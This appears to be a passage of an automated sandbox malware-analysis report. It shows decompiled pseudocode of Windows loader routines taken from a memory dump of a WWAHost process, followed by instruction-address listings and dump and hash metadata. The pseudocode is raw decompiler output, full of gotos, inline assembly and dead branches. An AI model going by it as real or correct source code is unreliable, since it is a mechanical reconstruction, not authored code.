				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x3a4d360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E03966600(0x3a452d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x3a47b9c; // 0x0
							_t281 = L03974620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E0399F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x3a47b90; // 0x77460000
								if(_t384 == 0) {
									_t353 =  *0x3a47b8c; // 0xb529e0
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E03972280(_t200, 0x3a484d8);
									_t277 =  *0x3a485f4; // 0xb52f50
									_t351 =  *0x3a485f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0xb52ee8
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E0396FFB0(_t287, _t353, 0x3a484d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E039ACC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E03966600(0x3a452d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E03967926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x3a4b239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E039DE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x3a48472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x3a4b218; // 0xb4bda406
														asm("ror edi, cl");
														 *0x3a4b1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E03972280(_t250, 0x3a484d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03993898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E0396FFB0(_t293, _t353, 0x3a484d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E039937F5(_t353, 0);
																}
																E03990413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E03989B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E039802D6(_t174);
																}
																L039777F0( *0x3a47b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E0398C277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L0396EC7F(_t353);
										L039819B8(_t287, 0, _t353, 0);
										_t200 = E0395F4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0399B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x3a4b2f8; // 0x11f0000
									if((_t206 |  *0x3a4b2fc) == 0 || ( *0x3a4b2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x3a4b2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E03A06B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E03A06AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E0396E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L0396EAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03999730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E0396E9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L03968F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03993C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}








































































































                                              0x0396d5f2
                                              0x0396d5f5
                                              0x0396d5f5
                                              0x0396d5fd
                                              0x0396d600
                                              0x0396d60a
                                              0x0396d60d
                                              0x0396d617
                                              0x0396d61d
                                              0x0396d627
                                              0x0396d62e
                                              0x0396d911
                                              0x0396d913
                                              0x00000000
                                              0x0396d919
                                              0x0396d919
                                              0x0396d919
                                              0x0396d634
                                              0x0396d634
                                              0x0396d634
                                              0x0396d634
                                              0x0396d640
                                              0x0396d8bf
                                              0x00000000
                                              0x0396d646
                                              0x0396d646
                                              0x0396d64d
                                              0x0396d652
                                              0x039bb2fc
                                              0x039bb2fc
                                              0x039bb302
                                              0x039bb33b
                                              0x039bb341
                                              0x00000000
                                              0x039bb304
                                              0x039bb304
                                              0x039bb319
                                              0x039bb31e
                                              0x039bb324
                                              0x039bb326
                                              0x039bb332
                                              0x039bb347
                                              0x039bb34c
                                              0x039bb351
                                              0x039bb35a
                                              0x00000000
                                              0x039bb328
                                              0x039bb328
                                              0x00000000
                                              0x039bb328
                                              0x039bb326
                                              0x0396d658
                                              0x0396d658
                                              0x0396d65b
                                              0x0396d665
                                              0x00000000
                                              0x0396d66b
                                              0x0396d66b
                                              0x0396d66b
                                              0x0396d66b
                                              0x0396d66d
                                              0x0396d672
                                              0x0396d67a
                                              0x00000000
                                              0x00000000
                                              0x0396d680
                                              0x0396d686
                                              0x0396d8ce
                                              0x0396d8d4
                                              0x0396d8dd
                                              0x0396d8e0
                                              0x0396d68c
                                              0x0396d691
                                              0x0396d69d
                                              0x0396d6a2
                                              0x0396d6a7
                                              0x0396d6b0
                                              0x0396d6b5
                                              0x0396d6e0
                                              0x0396d6b7
                                              0x0396d6b7
                                              0x0396d6b9
                                              0x0396d6b9
                                              0x0396d6bb
                                              0x0396d6bd
                                              0x0396d6ce
                                              0x0396d6d0
                                              0x0396d6d2
                                              0x039bb363
                                              0x039bb365
                                              0x00000000
                                              0x039bb36b
                                              0x00000000
                                              0x039bb36b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0396d6bf
                                              0x0396d6bf
                                              0x0396d6e5
                                              0x0396d6e7
                                              0x0396d6e9
                                              0x0396d6ec
                                              0x0396d6ec
                                              0x0396d6ef
                                              0x0396d6f5
                                              0x0396d6f9
                                              0x0396d6fb
                                              0x0396d6fd
                                              0x0396d701
                                              0x0396d703
                                              0x0396d70a
                                              0x0396d70a
                                              0x0396d701
                                              0x0396d710
                                              0x0396d710
                                              0x0396d6c1
                                              0x0396d6c1
                                              0x0396d6c6
                                              0x039bb36d
                                              0x039bb36f
                                              0x00000000
                                              0x039bb375
                                              0x039bb375
                                              0x039bb375
                                              0x00000000
                                              0x039bb375
                                              0x00000000
                                              0x0396d6cc
                                              0x0396d6d8
                                              0x0396d6d8
                                              0x0396d6d8
                                              0x00000000
                                              0x0396d6c6
                                              0x0396d6bf
                                              0x00000000
                                              0x0396d6da
                                              0x0396d6da
                                              0x0396d716
                                              0x0396d71b
                                              0x0396d720
                                              0x0396d726
                                              0x0396d726
                                              0x0396d72d
                                              0x00000000
                                              0x0396d733
                                              0x0396d739
                                              0x0396d742
                                              0x0396d750
                                              0x0396d758
                                              0x0396d764
                                              0x0396d776
                                              0x0396d77a
                                              0x0396d783
                                              0x0396d928
                                              0x0396d92c
                                              0x0396d93d
                                              0x0396d944
                                              0x0396d94f
                                              0x0396d954
                                              0x0396d956
                                              0x0396d95f
                                              0x0396d961
                                              0x0396d973
                                              0x0396d973
                                              0x0396d956
                                              0x0396d944
                                              0x0396d92c
                                              0x0396d78b
                                              0x039bb394
                                              0x0396d791
                                              0x0396d798
                                              0x039bb3a3
                                              0x039bb3bb
                                              0x039bb3bb
                                              0x0396d7a5
                                              0x0396d866
                                              0x0396d870
                                              0x0396d884
                                              0x0396d892
                                              0x0396d898
                                              0x0396d89e
                                              0x0396d8a0
                                              0x0396d8a6
                                              0x0396d8ac
                                              0x0396d8ae
                                              0x0396d8b4
                                              0x0396d8b4
                                              0x0396d8ae
                                              0x0396d7a5
                                              0x0396d78b
                                              0x0396d7b1
                                              0x039bb3c5
                                              0x039bb3c5
                                              0x0396d7c3
                                              0x0396d7ca
                                              0x0396d7e5
                                              0x0396d7eb
                                              0x0396d8eb
                                              0x0396d8ed
                                              0x00000000
                                              0x0396d8f3
                                              0x0396d8f3
                                              0x0396d8f3
                                              0x00000000
                                              0x0396d8ed
                                              0x0396d7cc
                                              0x0396d7cc
                                              0x0396d7d2
                                              0x00000000
                                              0x0396d7d4
                                              0x0396d7d4
                                              0x0396d7d7
                                              0x0396d7df
                                              0x039bb3d4
                                              0x039bb3d9
                                              0x039bb3dc
                                              0x039bb3dc
                                              0x039bb3df
                                              0x039bb3e2
                                              0x039bb468
                                              0x039bb46d
                                              0x039bb46f
                                              0x039bb46f
                                              0x039bb475
                                              0x0396d8f8
                                              0x0396d8f9
                                              0x0396d8fd
                                              0x039bb3e8
                                              0x039bb3e8
                                              0x039bb3eb
                                              0x039bb3ed
                                              0x00000000
                                              0x039bb3ef
                                              0x039bb3ef
                                              0x039bb3f1
                                              0x039bb3f4
                                              0x039bb3fe
                                              0x039bb404
                                              0x039bb409
                                              0x039bb40e
                                              0x039bb410
                                              0x039bb410
                                              0x039bb414
                                              0x039bb414
                                              0x039bb41b
                                              0x039bb420
                                              0x039bb423
                                              0x039bb425
                                              0x039bb427
                                              0x039bb42a
                                              0x039bb42d
                                              0x039bb42d
                                              0x039bb42a
                                              0x039bb432
                                              0x039bb436
                                              0x039bb438
                                              0x039bb43b
                                              0x039bb43b
                                              0x039bb449
                                              0x039bb44e
                                              0x039bb454
                                              0x039bb458
                                              0x039bb458
                                              0x039bb45d
                                              0x00000000
                                              0x039bb45d
                                              0x039bb3ed
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0396d7df
                                              0x0396d7d2
                                              0x0396d7ca
                                              0x039bb37c
                                              0x039bb37e
                                              0x039bb385
                                              0x039bb38a
                                              0x00000000
                                              0x039bb38a
                                              0x0396d742
                                              0x0396d7f1
                                              0x0396d7f8
                                              0x039bb49b
                                              0x039bb49b
                                              0x0396d800
                                              0x0396d837
                                              0x0396d843
                                              0x0396d845
                                              0x0396d847
                                              0x0396d84a
                                              0x0396d84b
                                              0x0396d84e
                                              0x0396d857
                                              0x0396d802
                                              0x0396d802
                                              0x0396d80d
                                              0x00000000
                                              0x0396d818
                                              0x0396d818
                                              0x0396d824
                                              0x0396d831
                                              0x039bb4a5
                                              0x039bb4ab
                                              0x039bb4b3
                                              0x039bb4b8
                                              0x039bb4bb
                                              0x00000000
                                              0x039bb4c1
                                              0x039bb4c1
                                              0x039bb4c8
                                              0x00000000
                                              0x039bb4ce
                                              0x039bb4d4
                                              0x039bb4e1
                                              0x039bb4e3
                                              0x039bb4e5
                                              0x00000000
                                              0x039bb4eb
                                              0x039bb4f0
                                              0x039bb4f2
                                              0x0396dac9
                                              0x0396dacc
                                              0x0396dacf
                                              0x0396dad1
                                              0x0396dd78
                                              0x0396dd78
                                              0x0396dcf2
                                              0x00000000
                                              0x0396dad7
                                              0x0396dad9
                                              0x0396dadb
                                              0x00000000
                                              0x00000000
                                              0x0396dae1
                                              0x0396dae1
                                              0x0396dae4
                                              0x0396dae6
                                              0x039bb4f9
                                              0x039bb4f9
                                              0x039bb500
                                              0x0396daec
                                              0x0396daec
                                              0x0396daf5
                                              0x0396daf8
                                              0x0396dafb
                                              0x0396db03
                                              0x0396db11
                                              0x0396db16
                                              0x0396db19
                                              0x0396db1b
                                              0x039bb52c
                                              0x039bb531
                                              0x039bb534
                                              0x0396db21
                                              0x0396db21
                                              0x0396db24
                                              0x0396dcd9
                                              0x0396dce2
                                              0x0396dce5
                                              0x0396dd6a
                                              0x0396dd6d
                                              0x00000000
                                              0x0396dd73
                                              0x039bb51a
                                              0x039bb51c
                                              0x039bb51f
                                              0x039bb524
                                              0x00000000
                                              0x039bb524
                                              0x0396dce7
                                              0x0396dce7
                                              0x0396dce7
                                              0x00000000
                                              0x0396dce7
                                              0x00000000
                                              0x0396db2a
                                              0x0396db2c
                                              0x0396db31
                                              0x0396db33
                                              0x0396db36
                                              0x0396db39
                                              0x0396db3b
                                              0x0396db66
                                              0x0396db66
                                              0x0396db3d
                                              0x0396db3d
                                              0x0396db3e
                                              0x0396db46
                                              0x0396db47
                                              0x0396db49
                                              0x0396db4c
                                              0x0396db53
                                              0x0396db55
                                              0x0396db58
                                              0x0396db5a
                                              0x039bb50a
                                              0x039bb50f
                                              0x039bb512
                                              0x0396db60
                                              0x0396db60
                                              0x0396db63
                                              0x0396db63
                                              0x00000000
                                              0x0396db63
                                              0x0396db5a
                                              0x0396db3b
                                              0x0396db24
                                              0x0396db69
                                              0x0396db69
                                              0x0396db6c
                                              0x0396db6f
                                              0x0396db74
                                              0x039bb557
                                              0x039bb557
                                              0x039bb55e
                                              0x0396db7a
                                              0x0396db7c
                                              0x0396db7f
                                              0x0396db82
                                              0x0396db85
                                              0x00000000
                                              0x0396db8b
                                              0x0396db8b
                                              0x0396db8d
                                              0x0396db9b
                                              0x0396db9b
                                              0x0396db9d
                                              0x0396dba0
                                              0x0396dba2
                                              0x0396dba4
                                              0x0396dba7
                                              0x0396dba9
                                              0x0396dbae
                                              0x0396dbae
                                              0x0396dbb1
                                              0x0396dbb4
                                              0x0396dbb4
                                              0x0396dbb7
                                              0x0396dbba
                                              0x0396dcd2
                                              0x0396dcd4
                                              0x00000000
                                              0x0396dbc0
                                              0x0396dbc0
                                              0x0396dbd2
                                              0x0396dbd7
                                              0x0396dbda
                                              0x0396dbdd
                                              0x0396dbdf
                                              0x00000000
                                              0x0396dbe5
                                              0x0396dbe5
                                              0x0396dbee
                                              0x0396dbf1
                                              0x039bb541
                                              0x039bb544
                                              0x00000000
                                              0x039bb546
                                              0x039bb546
                                              0x00000000
                                              0x039bb546
                                              0x0396dbf7
                                              0x0396dbf7
                                              0x0396dbfd
                                              0x0396dbfd
                                              0x0396dbff
                                              0x0396dc0b
                                              0x0396dc15
                                              0x0396dc1b
                                              0x0396dc1d
                                              0x0396dc21
                                              0x0396dc21
                                              0x0396dc23
                                              0x0396dc23
                                              0x0396dc26
                                              0x0396dc29
                                              0x0396dc2b
                                              0x00000000
                                              0x00000000
                                              0x0396dc31
                                              0x0396dc34
                                              0x0396dc36
                                              0x0396dcbf
                                              0x0396dcbf
                                              0x0396dcc2
                                              0x00000000
                                              0x0396dc3c
                                              0x0396dc41
                                              0x0396dc43
                                              0x00000000
                                              0x0396dc45
                                              0x0396dc45
                                              0x0396dc47
                                              0x00000000
                                              0x0396dc4d
                                              0x0396dc4d
                                              0x0396dc50
                                              0x0396dc52
                                              0x0396dc55
                                              0x0396dcfa
                                              0x0396dcfe
                                              0x0396dd08
                                              0x0396dd0a
                                              0x0396dd0c
                                              0x00000000
                                              0x0396dd12
                                              0x0396dd15
                                              0x0396dd2d
                                              0x0396dd2f
                                              0x0396dd32
                                              0x0396dd35
                                              0x00000000
                                              0x0396dd35
                                              0x0396dc5b
                                              0x0396dc5b
                                              0x0396dc5e
                                              0x0396dc61
                                              0x0396dc64
                                              0x0396dc67
                                              0x0396dc67
                                              0x0396dc6a
                                              0x0396dc6c
                                              0x0396dc8e
                                              0x0396dc8e
                                              0x0396dc91
                                              0x0396dc93
                                              0x0396dcce
                                              0x0396dcce
                                              0x0396dc95
                                              0x0396dc9c
                                              0x0396dc6e
                                              0x0396dc72
                                              0x0396dc75
                                              0x0396dc77
                                              0x0396dc79
                                              0x039bb551
                                              0x039bb551
                                              0x00000000
                                              0x0396dc7f
                                              0x0396dc7f
                                              0x0396dc81
                                              0x00000000
                                              0x0396dc83
                                              0x0396dc86
                                              0x0396dc88
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0396dc88
                                              0x0396dc81
                                              0x0396dc79
                                              0x0396dc6c
                                              0x0396dc55
                                              0x0396dc47
                                              0x0396dc43
                                              0x00000000
                                              0x0396dc36
                                              0x0396dc23
                                              0x00000000
                                              0x0396dbff
                                              0x0396dbf1
                                              0x0396dbdf
                                              0x0396db8f
                                              0x0396db92
                                              0x0396db95
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0396db95
                                              0x0396db8d
                                              0x0396db85
                                              0x0396db74
                                              0x0396dc9f
                                              0x0396dca2
                                              0x0396dcb0
                                              0x0396dcb0
                                              0x0396dad1
                                              0x039bb4e5
                                              0x039bb4c8
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0396d831
                                              0x0396d80d
                                              0x00000000
                                              0x0396d800
                                              0x039bb47f
                                              0x039bb485
                                              0x00000000
                                              0x039bb485
                                              0x0396d665
                                              0x0396d652
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 82aef15be04c9de39235a024d7b1903de20f3305e93b2fafcb3249d62666fb0f
                                              • Instruction ID: 7a51933c7de7d23a0f7f962d5115ddfccd8ebabfd3061f0f218d743bdbab0ddd
                                              • Opcode Fuzzy Hash: 82aef15be04c9de39235a024d7b1903de20f3305e93b2fafcb3249d62666fb0f
                                              • Instruction Fuzzy Hash: 71E1E574B02359CFDB24EF18C984BA9B7BABF85344F0801E9D9199B290D774AD81CF52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0396849B Relevance: .3, Instructions: 290COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 92%
                                              			E0396849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x3a2f9c0);
				E039AD0E8(__ebx, __edi, __esi);
